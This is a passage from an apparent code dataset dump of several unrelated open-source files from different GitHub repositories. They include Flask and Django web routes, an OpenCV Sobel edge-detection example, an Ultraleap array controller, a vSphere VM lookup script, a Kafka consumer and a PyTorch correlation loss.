methods=[\"POST\"])\ndef create_transfer():\n '''\n create a transfer for the current user\n '''\n\n user = current_user.to_dict()\n res = request.get_json()\n\n form = TransferForm()\n form[\"csrf_token\"].data = request.cookies[\"csrf_token\"]\n\n if form.validate_on_submit():\n new_transfer = Transfer(\n portfolio_id=user[\"portfolio\"][\"id\"],\n bank_account_id=res[\"bank_account_id\"],\n user_id=user[\"id\"],\n amount=res[\"amount\"],\n type=res[\"type\"],\n date=datetime.now()\n )\n db.session.add(new_transfer)\n db.session.commit()\n return new_transfer.to_dict()\n\n return {'errors': form_errors_obj_list(form.errors)}, 401\n","repo_name":"Jblancs/robinhood-clone","sub_path":"app/api/transfer_routes.py","file_name":"transfer_routes.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"342016795","text":"from http.server import BaseHTTPRequestHandler, HTTPServer \nimport time \nimport json\nfrom socketserver import ThreadingMixIn\nimport threading\n\nhostName = \"0.0.0.0\"\nserverPort = 80\n\nclass Handler(BaseHTTPRequestHandler):\n \n def do_GET(self):\n \n if self.path == \"/\":\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n content = open(\"index.html\", \"r\").read() \n self.wfile.write(bytes(content, \"utf-8\"))\n else:\n self.send_response(\"404\")\n \n return\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\"Handle requests in a separate thread\"\"\"\n \nif __name__ == '__main__':\n server = ThreadedHTTPServer((hostName, serverPort), Handler)\n print(time.asctime(), \"Server Starts - %s:%s\" % (hostName, serverPort))\n \ntry:\n server.serve_forever()\nexcept KeyboardInterrupt:\n pass\n \nserver.server_close()\nprint(time.asctime(), \"Server Stops - %s:%s\" % (hostName, serverPort))\n \n\n","repo_name":"silviafpp/python_webserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19485167926","text":"# coding=utf-8\n#Sober算子\n\n# 图像中的边缘区域,像素值会发生“跳跃”,对这些像素求导,在其一阶导数在边缘位置为极值,这就是Sobel算子使用的原理——极值处就是边缘。\n\n# Sobel算子依然是一种过滤器,只是其是带有方向的。在OpenCV-Python中,使用Sobel的算子的函数原型如下:\n# dst = cv2.Sobel(src, ddepth, dx, dy[, dst[, ksize[, scale[, delta[, borderType]]]]])\n# 函数返回其处理结果。\n#前四个是必须的参数:\n#第一个参数是需要处理的图像;\n# 第二个参数是图像的深度,-1表示采用的是与原图像相同的深度。目标图像的深度必须大于等于原图像的深度;\n# dx和dy表示的是求导的阶数,0表示这个方向上没有求导,一般为0、1、2。\n# 其后是可选的参数:\n# dst不用解释了;\n# ksize是Sobel算子的大小,必须为1、3、5、7。\n# scale是缩放导数的比例常数,默认情况下没有伸缩系数;\n# delta是一个可选的增量,将会加到最终的dst中,同样,默认情况下没有额外的值加到dst中;\n# borderType是判断图像边界的模式。这个参数默认值为cv2.BORDER_DEFAULT。\n\n\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('D:/zsb.jpg', 0)\norigin = cv2.imread('D:/zsb.jpg')\nx = cv2.Sobel(img, cv2.CV_16S, 1, 0)\ny = cv2.Sobel(img, cv2.CV_16S, 0, 1)\n\nabsX = cv2.convertScaleAbs(x) # 转回uint8\nabsY = cv2.convertScaleAbs(y)\n\ndst = cv2.addWeighted(absX, 0.5, absY, 0.5, 0)\n\n\nprint(dst.shape)\n\ncv2.imshow('absX', absX)\ncv2.imshow('absY', absY)\n\ncv2.imshow('Result', dst)\n\ncv2.imshow('Origin', origin)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# 解释:\n# 在Sobel函数的第二个参数这里使用了cv2.CV_16S。因为OpenCV文档中对Sobel算子的介绍中有这么一句:“in the case of 8-bit input images it will result in truncated derivatives”。即Sobel函数求完导数后会有负值,还有会大于255的值。而原图像是uint8,即8位无符号数,所以Sobel建立的图像位数不够,会有截断。因此要使用16位有符号的数据类型,即cv2.CV_16S。\n# 在经过处理后,别忘了用convertScaleAbs()函数将其转回原来的uint8形式。否则将无法显示图像,而只是一副灰色的窗口。\n# convertScaleAbs()的原型为:\n# dst = cv2.convertScaleAbs(src[, dst[, alpha[, beta]]])\n# 其中可选参数alpha是伸缩系数,beta是加到结果上的一个值。结果返回uint8类型的图片。\n\n# 由于Sobel算子是在两个方向计算的,最后还需要用cv2.addWeighted(...)函数将其组合起来。其函数原型为:\n# dst = cv2.addWeighted(src1, alpha, src2, beta, gamma[, dst[, dtype]])\n# 其中alpha是第一幅图片中元素的权重,beta是第二个的权重,gamma是加到最后结果上的一个值。","repo_name":"ihona/Python","sub_path":"OpenCV/object2.py","file_name":"object2.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23904560691","text":"import numpy as np\nimport socket\nimport subprocess\nimport os.path\nfrom ..arrays import NormalTransducerArray\n\n\nclass UltraleapArray:\n \"\"\"Mixin class for Ultraleap arrays.\n\n This implements a very simple control of the Ultraleap hardware from pytohn,\n by sending data via TCP to a c++ process running in the background.\n\n Note\n ----\n This class is not implemented by Ultraleap, and no guarantee is given that\n the implementation works or gives the correct output.\n\n **Use at your own risk!**\n\n \"\"\"\n def connect(self, *args, **kwargs):\n \"\"\"Connect to a physical array.\n\n See `UltraleapArray.TCPconnection` for more details.\n\n \"\"\"\n self.connection = UltraleapArray.TCPconnection(*args, **kwargs)\n\n @property\n def connection(self):\n try:\n return self._connection\n except AttributeError:\n self.connect()\n return self._connection\n\n @connection.setter\n def connection(self, value):\n self._connection = value\n\n class TCPconnection:\n \"\"\"Communicate with a Ultraleap array via TCP.\n\n Starts a c++ process in the background which connects to a Ultraleap array.\n Communicates with the c++ program using TCP messages.\n The only mode implemented for the array is a cyclical transition of stored states.\n A number of states is loaded, either from file or sent via TCP. The states are\n cycled through in a configurable rate or manually. At the end of the list of states\n the cycle starts over from the start.\n This makes it relatively easy to create closed paths by ensuring that the last state\n and the first state is designed to levitate at (almost) the same position.\n\n The required binary file `array_control` is compiled from the included c++ source files if not present.\n Inspect the makefile in unix systems, or make.bat on windows to see how the files are compiled.\n If the compilation fails a `RuntimeError` is raised. If the binary already exists it will be used.\n\n Parameters\n ----------\n ip : string, default '127.0.0.1'\n The IP address to use for the local TCP-connection.\n port : int, default 0\n The port to use for the TCP connection.\n use_array : bool, default True\n Set to false to not try to connect to an array, just run the c++\n executable in the background. Mostly for debugging.\n verbose : int, default 0\n Control the verbosity level of the c++ program.\n 0 will not print anything, higher values will give more information.\n normalize : bool, default True\n Toggles normalization of the state amplitudes.\n\n \"\"\"\n\n _executable = 'array_control'\n\n def __init__(self, ip='127.0.0.1', port=0, use_array=True, verbose=0, normalize=True):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((ip, port))\n self.ip, self.port = self.sock.getsockname()\n\n args = []\n if verbose:\n args.append('--verbose')\n args.append(str(verbose))\n if not use_array:\n args.append('-noarray')\n\n self._start_subprocess(*args)\n self.sock.listen()\n self.conn, self._addr = self.sock.accept()\n self.normalize = normalize\n\n def _start_subprocess(self, *extra_args):\n directory = os.path.dirname(__file__)\n name = os.path.join(directory, self.executable)\n if not os.path.exists(name):\n self._compile()\n args = [name, '--ip', self.ip, str(self.port)]\n args.extend(extra_args)\n self._cpp_process = subprocess.Popen(args=args)\n\n @staticmethod\n def _compile():\n directory = os.path.dirname(__file__)\n if os.name == 'nt':\n result = subprocess.run(os.path.join(directory, 'make.bat'), cwd=directory)\n if result.returncode != 0:\n raise RuntimeError('array_control binary non-existent and c++ toolchain cannot compile binary!')\n else:\n result = subprocess.run('make', cwd=directory)\n if result.returncode != 0:\n raise RuntimeError('array_control binary non-existent and c++ toolchain cannot compile binary!')\n\n def _send(self, *messages):\n for message in messages:\n if type(message) is not bytes:\n try:\n message = bytes(message)\n except TypeError:\n message = bytes(message, 'ASCII')\n if message[-1] is not 0:\n message += b'\\0' # Properly terminate strings.\n msg_len = np.uint32(len(message))\n self.conn.sendall(msg_len)\n self.conn.sendall(message)\n\n def _recv(self, count=1):\n if count == 1:\n msg_len = np.squeeze(np.frombuffer(self.conn.recv(4), dtype=np.uint32))\n msg = b''\n while len(msg) < msg_len:\n msg += self.conn.recv(msg_len)\n return msg\n else:\n return [self._recv() for _ in range(count)]\n\n def close(self):\n \"\"\"Close the collection to the array and terminate the c++ process.\"\"\"\n if self._cpp_process.poll() is None:\n self._send('quit')\n self._cpp_process.wait()\n self.conn.close()\n self.sock.close()\n\n def __del__(self):\n self.close()\n\n @property\n def executable(self): # noqa : D401\n \"\"\"The name of the binary to use.\"\"\"\n if os.name == 'nt':\n return self._executable + '.exe'\n else:\n return self._executable\n\n @executable.setter\n def executable(self, val):\n self._executable = val.rstrip('.exe')\n\n @property\n def emit(self):\n \"\"\"Control if the array is emitting or not.\"\"\"\n self._send('emit')\n return self._recv().decode()\n\n @emit.setter\n def emit(self, val):\n if val is True or val == 'on':\n self._send('emit on')\n elif val is False or val == 'off':\n self._send('emit off')\n else:\n raise ValueError('Unknown emit state: ' + val)\n\n @property\n def amplitude(self):\n \"\"\"Control the overall amplitude scaling of the array.\"\"\"\n self._send('ampl')\n return np.array(self._recv()).astype(float)\n\n @amplitude.setter\n def amplitude(self, val):\n if val < 0 or val > 1:\n raise ValueError('Amplitude must not be <0 or >1')\n self._send('amplitude ' + str(val))\n\n @property\n def rate(self):\n \"\"\"Control the state transition rate of the array, in Hz.\"\"\"\n self._send('rate')\n return np.array(self._recv()).astype(float)\n\n @rate.setter\n def rate(self, val):\n self._send('rate ' + str(val))\n\n def next(self, count=1):\n \"\"\"Go to the next state.\n\n Parameters\n ----------\n count : int\n How many states to move, default 1.\n\n \"\"\"\n self._send('next ' + str(count))\n\n def prev(self, count=1):\n \"\"\"Go to the previous state.\n\n Parameters\n ----------\n count : int\n How many states to move, default 1.\n\n \"\"\"\n self._send('prev ' + str(count))\n\n @property\n def num_transducers(self):\n \"\"\"Number of transducers in the array.\"\"\"\n self._send('transducer count')\n return np.array(self._recv()).astype(int)\n\n @property\n def positions(self):\n \"\"\"Positions of the transducer elements.\"\"\"\n num_transducers = self.num_transducers\n self._send('transducer positions')\n raw = self._recv(num_transducers)\n return np.array([np.array(x.decode().strip('()').split(',')).astype(float) for x in raw])\n\n @property\n def normals(self):\n \"\"\"Normals of the transducer elements.\"\"\"\n num_transducers = self.num_transducers\n self._send('transducer normals')\n raw = self._recv(num_transducers)\n return np.array([np.array(x.decode().strip('()').split(',')).astype(float) for x in raw])\n\n @property\n def index(self):\n \"\"\"Current state index.\"\"\"\n self._send('index')\n return np.array(self._recv()).astype(int)\n\n @index.setter\n def index(self, val):\n self._send('index ' + str(val))\n\n @property\n def states(self):\n \"\"\"Control the stored states.\n\n Set this property to send new states to the array.\n Get this property to check what states are stored for the array.\n The states have the shape `(M, N)`, where `M` is the number of states,\n and `N` is the number of transducers in the array.\n \"\"\"\n num_transducers = self.num_transducers\n self._send('printstates')\n num_states_raw = self._recv()\n num_states = np.array(num_states_raw.decode().strip(\"Displaying all states.\")).astype(int)\n states = []\n for _ in range(num_states):\n header = self._recv()\n state_raw = self._recv(num_transducers)\n states.append([complex(*np.array(trans_raw.decode().rsplit(':')[1].strip(' () ').split(',')).astype(float)) for trans_raw in state_raw])\n return np.array(states).conj()\n\n @states.setter\n def states(self, states):\n states = np.atleast_2d(states)\n if self.normalize:\n normalization = np.max(np.abs(states))\n else:\n normalization = 1\n num_states = states.size / self.num_transducers\n if not num_states == int(num_states):\n raise ValueError('Cannot send uncomplete states!')\n self._send('states ' + str(num_states))\n for state in states:\n msg = (state / normalization).conj().astype(np.complex64).tobytes()\n self._send(msg)\n\n def read_file(self, filename):\n \"\"\"Read a file with states.\n\n Specify a file with states to read in the c++ process.\n This is not to be confused with `~levitate.hardware.data_from_c++`, which\n reads a file to a numpy.array.\n\n Parameters\n ----------\n filename : str\n The file to read.\n\n \"\"\"\n self._send('file ' + filename)\n\n\nclass DragonflyArray(NormalTransducerArray, UltraleapArray):\n \"\"\"Rectangular array with Ultraleap Dragonfly U5 layout.\n\n This is a 16x16 element array where the order of the transducer elements\n are the same as the iteration order in the Ultraleap SDK. Otherwise\n behaves exactly like a `RectangularArray`.\n \"\"\"\n\n spread = 10.47e-3\n grid_indices = np.array([\n [95, 94, 93, 92, 111, 110, 109, 108, 159, 158, 157, 156, 175, 174, 173, 172],\n [91, 90, 89, 88, 107, 106, 105, 104, 155, 154, 153, 152, 171, 170, 169, 168],\n [87, 86, 85, 84, 103, 102, 101, 100, 151, 150, 149, 148, 167, 166, 165, 164],\n [83, 82, 81, 80, 99, 98, 97, 96, 147, 146, 145, 144, 163, 162, 161, 160],\n [79, 78, 77, 76, 127, 126, 125, 124, 143, 142, 141, 140, 191, 190, 189, 188],\n [75, 74, 73, 72, 123, 122, 121, 120, 139, 138, 137, 136, 187, 186, 185, 184],\n [71, 70, 69, 68, 119, 118, 117, 116, 135, 134, 133, 132, 183, 182, 181, 180],\n [67, 66, 65, 64, 115, 114, 113, 112, 131, 130, 129, 128, 179, 178, 177, 176],\n [49, 48, 51, 50, 1, 0, 3, 2, 241, 240, 243, 242, 193, 192, 195, 194],\n [53, 52, 55, 54, 5, 4, 7, 6, 245, 244, 247, 246, 197, 196, 199, 198],\n [57, 56, 59, 58, 9, 8, 11, 10, 249, 248, 251, 250, 201, 200, 203, 202],\n [61, 60, 63, 62, 13, 12, 15, 14, 253, 252, 255, 254, 205, 204, 207, 206],\n [33, 32, 35, 34, 17, 16, 19, 18, 225, 224, 227, 226, 209, 208, 211, 210],\n [37, 36, 39, 38, 21, 20, 23, 22, 229, 228, 231, 230, 213, 212, 215, 214],\n [41, 40, 43, 42, 25, 24, 27, 26, 233, 232, 235, 234, 217, 216, 219, 218],\n [45, 44, 47, 46, 29, 28, 31, 30, 237, 236, 239, 238, 221, 220, 223, 222]\n ])\n\n def __init__(self, **kwargs):\n ny, nx = self.grid_indices.shape\n positions = np.zeros((3, nx * ny), float)\n positions[:, self.grid_indices] = np.stack(\n np.meshgrid(np.arange(16) - 7.5, 7.5 - np.arange(16), 0, indexing='xy'),\n axis=0).reshape((3, ny, nx)) * self.spread\n super().__init__(positions=positions, normals=[0, 0, 1], transducer_size=10e-3, **kwargs)\n","repo_name":"AppliedAcousticsChalmers/levitate","sub_path":"levitate/hardware/_ultraleap.py","file_name":"_ultraleap.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"83"} +{"seq_id":"11010145383","text":"from django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom flask import json\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom Django_MVVM.dao_emp import DaoEmp\r\n\r\ndef go(request):\r\n return render(request, 'index.html')\r\n\r\n@csrf_exempt\r\ndef ajax(request):\r\n #menu = request.GET.get(\"menu\", '')\r\n menu = json.loads(request.body)\r\n context = {\r\n 'result': menu['menu']\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_list(request):\r\n mylist = DaoEmp().selectList()\r\n context = {\r\n 'list':mylist\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_detail(request):\r\n e_id = request.POST['e_id']\r\n #id = json.loads(request.body)\r\n emp = DaoEmp().selectOne(e_id)\r\n context = {\r\n 'emp' : emp\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_update(request):\r\n e_id = request.POST['e_id']\r\n e_name = request.POST['e_name']\r\n sex = request.POST['sex']\r\n addr = request.POST['addr']\r\n res = DaoEmp().update(e_id, e_name, sex, addr)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_insert(request):\r\n e_id = request.POST['e_id']\r\n e_name = request.POST['e_name']\r\n sex = request.POST['sex']\r\n addr = request.POST['addr']\r\n res = DaoEmp().insert(e_id, e_name, sex, addr)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n\r\n@csrf_exempt\r\ndef ajax_emp_del(request):\r\n e_id = request.POST['e_id']\r\n res = DaoEmp().delete(e_id)\r\n context = {\r\n 'res':res\r\n }\r\n return JsonResponse(context)\r\n","repo_name":"hyungeunShin/Python-Practice","sub_path":"Django_MVVM/Django_MVVM/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38422469331","text":"import atexit\nimport sys\nimport re\nfrom datetime import datetime\nfrom logging import getLogger, Formatter, StreamHandler, CRITICAL, WARNING, INFO, DEBUG\nlogger = getLogger(__name__)\n\nfrom pyVim import connect\nfrom pyVmomi import vmodl\nfrom pyVmomi import vim\nimport pytz\n\nfrom tools import cli, get\n\ndef setup_args():\n parser = cli.build_arg_parser()\n\n parser.add_argument('-V', '--vmhost',\n required=True,\n action='append',\n help='VMhost names')\n\n parser.add_argument('--verbose',\n action='store_true',\n default=False,\n help='Verbose mode(default: False)')\n\n parser.add_argument('--timezone',\n required=False,\n default='Asia/Tokyo',\n help='Default time zone (Asia/Tokyo)')\n\n return cli.prompt_for_password(parser.parse_args())\n\ndef print_vm_info(virtual_machine):\n summary = virtual_machine.summary\n output = \"View virtual machime summary\" \\\n + \"\\n Name : \" + summary.config.name \\\n + \"\\n Template : \" + str(summary.config.template) \\\n + \"\\n Path : \" + summary.config.vmPathName \\\n + \"\\n Guest : \" + summary.config.guestFullName \\\n + \"\\n Instance UUID : \" + summary.config.instanceUuid \\\n + \"\\n Bios UUID : \" + summary.config.uuid \\\n + \"\\n CPU Num : \" + str(summary.config.numCpu) \\\n + \"\\n Memory Size : \" + str(summary.config.memorySizeMB) + \" MB\"\n annotation = summary.config.annotation\n if annotation:\n output = output + \"\\n Annotation : \" + annotation\n\n output = output + \"\\n State : \" + summary.runtime.powerState\n if summary.guest is not None:\n ip_address = summary.guest.ipAddress\n tools_version = summary.guest.toolsStatus\n if tools_version is not None:\n output = output + \"\\n VMware-tools : \" + tools_version\n else:\n output = output + \"\\n Vmware-tools : None\"\n if ip_address:\n output = output + \"\\n Ip address : \" + ip_address\n else:\n output = output + \"\\n Ip address : None\"\n if summary.runtime.question is not None:\n output = output + \"\\n Question : \" + summary.runtime.question.text\n logger.debug(output)\n\ndef main():\n args = setup_args()\n exit_status = 0\n\n # logger setting\n formatter = Formatter('[%(asctime)s]%(levelname)s - %(message)s')\n #formatter = Formatter('[%(asctime)s][%(funcName)s:%(lineno)d]%(levelname)s - %(message)s')\n logger.setLevel(DEBUG) # debug 固定\n\n console = StreamHandler()\n if hasattr(args, 'verbose') and args.verbose == True:\n console.setLevel(DEBUG)\n else:\n console.setLevel(INFO)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n try:\n if args.disable_ssl_verification:\n service_instance = connect.SmartConnectNoSSL(host=args.host,\n user=args.user,\n pwd=args.password,\n port=int(args.port))\n else:\n service_instance = connect.SmartConnect(host=args.host,\n user=args.user,\n pwd=args.password,\n port=int(args.port))\n\n if not service_instance:\n logger.critical(\"Could not connect to the specified host ' \\\n 'using specified username and password\")\n sys.exit(1)\n\n atexit.register(connect.Disconnect, service_instance)\n\n content = service_instance.RetrieveContent()\n\n # VM List作成\n vm_list = get.get_vms_by_names(content, args.vmhost)\n if len(vm_list) == 0:\n logger.warning('Virtual Machine is not found')\n sys.exit(1)\n\n summary = vm_list[0].summary\n if summary.guest is not None:\n print(summary.guest.ipAddress, end='')\n else:\n logger.warning('Ip address is not found')\n sys.exit(3)\n\n except vmodl.MethodFault as ex:\n logger.critical('Caught vmodl fault : ' + ex.msg)\n import traceback\n traceback.print_exc()\n sys.exit(253)\n\n except Exception as ex:\n logger.critical('Caught exception : ' + str(ex))\n import traceback\n traceback.print_exc()\n sys.exit(254)\n\n sys.exit(exit_status)\n\n# Start program\nif __name__ == \"__main__\":\n main()\n","repo_name":"h-mineta/vmware-pyvmomi-tools","sub_path":"get_machie_ipaddress.py","file_name":"get_machie_ipaddress.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38630524535","text":"def longestPeak(array):\n # Write your code here.\n longest_peak = 0\n for i in range(1,len(array)-1):\n # find the peak\n if array[i] > array[i-1] and array[i] > array[i+1]:\n # get left side length\n j=i-1\n while j >0 and array[j] > array[j-1]:\n j-=1\n # get right side length\n k=i+1\n while k < len(array)-1 and array[k] > array[k+1]:\n k+=1\n longest_peak = max(longest_peak,k-j+1)\n return longest_peak","repo_name":"narendra-devireddy/ds_and_algorithms","sub_path":"algoexpert/longest_peak.py","file_name":"longest_peak.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3236497221","text":"from pykafka import KafkaClient\nimport json\nimport os\nimport sys\n\n\nclass PyKafkaConsumer:\n def __init__(self, config_dict):\n self.config_dict = config_dict\n self.bootstrap_servers = self.config_dict[\"bootstrap_servers\"] # kafka bootstrap server\n self.topic = bytes(self.config_dict['topics'])\n\n def consume_from_kafka(self):\n kafka_client = KafkaClient(hosts=self.bootstrap_servers)\n topic = kafka_client.topics[self.topic]\n consumer = topic.get_simple_consumer()\n for msg in consumer:\n if msg is not None:\n print(json.loads(msg.value))\n\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], \"r\") as fd:\n config_dict = json.load(fd)\n py_kafka_consumer = PyKafkaConsumer(config_dict['kafka']['output'])\n py_kafka_consumer.consume_from_kafka()\n","repo_name":"smps92/smps-code","sub_path":"utils/kafka_consumer.py","file_name":"kafka_consumer.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22640053293","text":"import numpy as np\nimport scipy.stats.stats as sciStats\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport logging\n\n\nfrom volsim.params import *\n\nclass CorrelationLoss(nn.modules.loss._Loss):\n def __init__(self, params:Params, useGPU:bool):\n super(CorrelationLoss, self).__init__()\n self.useGPU = useGPU\n if useGPU:\n self.epsilon = torch.tensor(0.0000001).cuda()\n else:\n self.epsilon = torch.tensor(0.0000001)\n self.params = params\n self.corHistoryMode = params.corHistoryMode\n self.weightMSE = params.lossFacMSE\n self.weightRelMSE = params.lossFacRelMSE\n self.weightPearsonCorr = params.lossFacPearsonCorr\n self.weightSlConvReg = params.lossFacSlConvReg\n self.weightSizeReg = params.lossFacSizeReg\n self.sizeRegExp = params.lossSizeExp\n self.useOnlineMean = params.lossOnlineMean\n self.aggregateCorr = params.lossCorrAggregate\n\n self.resetCorrAcc()\n\n self.stepHist = np.zeros(6)\n self.stepHistCount = 0\n\n self.lastSampleSliceCorr = 0\n self.epochHist = {\"pred\":[], \"targ\":[], \"path\":[], \"enstd\":[], \"tempPred\":[], \"tempTarg\":[], \"tempPath\":[], \"tempEnstd\":[]}\n\n # has to be called after all simulation pairs of one sample are processed\n # to ensure correct loss computation for next sample \n def resetCorrAcc(self):\n self.accX = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accY = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.count = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accFinal = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.countFinal = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n self.accX.requires_grad = False\n self.accY.requires_grad = False\n self.count.requires_grad = False\n self.accFinal.requires_grad = False\n self.countFinal.requires_grad = False\n\n\n def forward(self, prediction:torch.Tensor, target:torch.Tensor, path:np.ndarray) -> torch.Tensor:\n if self.useGPU:\n prediction = prediction.cuda()\n target = target.cuda()\n\n corr = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n correlation = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n # pearson correlation\n if self.weightPearsonCorr > 0:\n corr = self.pearsonCorrOnline(prediction, target)\n self.lastSampleSliceCorr = torch.mean(corr).item()\n correlation = self.weightPearsonCorr * 0.5 * (1-corr)\n\n # mse\n l2 = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightMSE > 0:\n l2 = self.weightMSE * self.distanceL2(prediction, target)\n\n # relative mse\n relL2 = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightRelMSE > 0:\n predMean = self.accX.detach() / self.count.detach()\n targMean = self.accY.detach() / self.count.detach()\n relL2 = self.weightRelMSE * self.distanceL2(prediction-predMean, target-targMean)\n\n # size regularization\n sizeReg = torch.tensor([0.0]).cuda() if self.useGPU else torch.tensor([0.0])\n if self.weightSizeReg > 0:\n temp = torch.where(prediction > 1, torch.pow(prediction-1, self.sizeRegExp), torch.zeros_like(prediction))\n sizeReg = self.weightSizeReg * torch.sum(temp, dim=1)\n\n # step history\n self.stepHist = self.stepHist + np.array([\n torch.mean(l2+relL2+correlation+sizeReg).item(),\n torch.mean(l2).item(),\n torch.mean(correlation).item(),\n torch.mean(corr).item(),\n torch.mean(relL2).item(),\n torch.mean(sizeReg).item(),\n ])\n self.stepHistCount = self.stepHistCount + 1\n\n # epoch history\n self.epochHist[\"tempPred\"] += [prediction.cpu().detach().numpy()]\n self.epochHist[\"tempTarg\"] += [target.cpu().detach().numpy()]\n self.epochHist[\"tempPath\"] += [np.repeat(path[:,None], target.shape[1], axis=1)]\n\n result = torch.mean(l2 + relL2 + correlation + sizeReg)\n if torch.isnan(result):\n logging.error(\"NAN in loss!\")\n logging.error(\"L2 \" + str(l2))\n logging.error(\"Rel L2 \" + str(relL2))\n logging.error(\"Corr \" + str(corr))\n logging.error(\"Correlation \" + str(correlation))\n raise ValueError(\"NAN in loss!\")\n return result\n\n\n def updateMeanAccs(self, x:torch.Tensor, y:torch.Tensor):\n if self.useGPU:\n x = x.cuda()\n y = y.cuda()\n\n self.count = self.count + x.shape[1]\n self.accX = self.accX + torch.sum(x, dim=1, keepdim=True)\n self.accY = self.accY + torch.sum(y, dim=1, keepdim=True)\n\n\n def pearsonCorrOnline(self, x:torch.Tensor, y:torch.Tensor) -> torch.Tensor:\n if self.useOnlineMean:\n self.updateMeanAccs(x, y)\n\n if self.count <= 1:\n return torch.zeros_like(self.accFinal)\n\n meanX = self.accX.detach() / self.count.detach()\n meanY = self.accY.detach() / self.count.detach()\n xm = x - meanX\n ym = y - meanY\n rNum = torch.sum(xm*ym, dim=1, keepdim=True) #manual dot product\n rDen = torch.norm(xm, 2, dim=1, keepdim=True) * torch.norm(ym, 2, dim=1, keepdim=True)\n rVal = rNum / torch.max(rDen, self.epsilon) #epsilon for numerical stability\n\n if any(torch.isnan(rVal)):\n logging.error(\"NAN in correlation computation!\")\n logging.error(\"x \" + str(x))\n logging.error(\"y \" + str(y))\n logging.error(\"accX \" + str(self.accX))\n logging.error(\"accY \" + str(self.accY))\n logging.error(\"count \" + str(self.count))\n logging.error(\"meanX \" + str(meanX))\n logging.error(\"meanY \" + str(meanY))\n logging.error(\"rNum \" + str(rNum))\n logging.error(\"rDen \" + str(rDen))\n logging.error(\"rVal \" + str(rVal))\n raise ValueError(\"NAN in correlation computation!\")\n\n if self.aggregateCorr:\n # average over previous pairs from same sample for better stability\n self.accFinal = self.accFinal.detach() + rVal\n self.countFinal = self.countFinal.detach() + 1\n return self.accFinal / self.countFinal\n else:\n return rVal\n\n\n def getStepHistory(self) -> np.ndarray:\n result = self.stepHist / self.stepHistCount\n self.stepHist = np.zeros(6)\n self.stepHistCount = 0\n self.resetCorrAcc()\n\n # normalize all step distances to [0.1, 1.0]\n predStep = np.concatenate(self.epochHist[\"tempPred\"], axis=1) #[3,55]\n dMax = np.max(predStep, axis=1, keepdims=True) #[3,1]\n dMin = np.min(predStep, axis=1, keepdims=True) #[3,1]\n if (dMin == dMax).all():\n predStep = predStep - dMin + 0.1\n elif (dMin == dMax).any():\n for i in range(dMin.shape[0]):\n if dMin[i] == dMax[i]:\n predStep[i] = predStep[i] - dMin[i] + 0.1\n else:\n predStep[i] = 0.9 * ((predStep[i] - dMin[i]) / (dMax[i] - dMin[i])) + 0.1\n else:\n predStep = 0.9 * ((predStep - dMin) / (dMax - dMin)) + 0.1\n\n self.epochHist[\"pred\"] += [predStep]\n self.epochHist[\"targ\"] += [np.concatenate(self.epochHist[\"tempTarg\"], axis=1)]\n self.epochHist[\"path\"] += [np.concatenate(self.epochHist[\"tempPath\"], axis=1)]\n self.epochHist[\"tempPred\"] = []\n self.epochHist[\"tempTarg\"] = []\n self.epochHist[\"tempPath\"] = []\n return result\n\n def getEpochHistory(self, splits:dict=None) -> tuple:\n predEpoch = np.concatenate(self.epochHist[\"pred\"], axis=0)\n targEpoch = np.concatenate(self.epochHist[\"targ\"], axis=0)\n pathEpoch = np.concatenate(self.epochHist[\"path\"], axis=0)\n\n corrSplit = {}\n if splits:\n for split in splits:\n idx = np.core.defchararray.find(pathEpoch.astype(str), splits[split]) >= 0\n stacked = np.stack([predEpoch[idx], targEpoch[idx]])\n if self.corHistoryMode == \"pearson\":\n corr = np.corrcoef(stacked)[0,1]\n elif self.corHistoryMode == \"spearman\":\n corr, _ = sciStats.spearmanr(stacked.transpose((1,0)))\n else:\n raise ValueError(\"Invalid ground \")\n corrSplit[split] 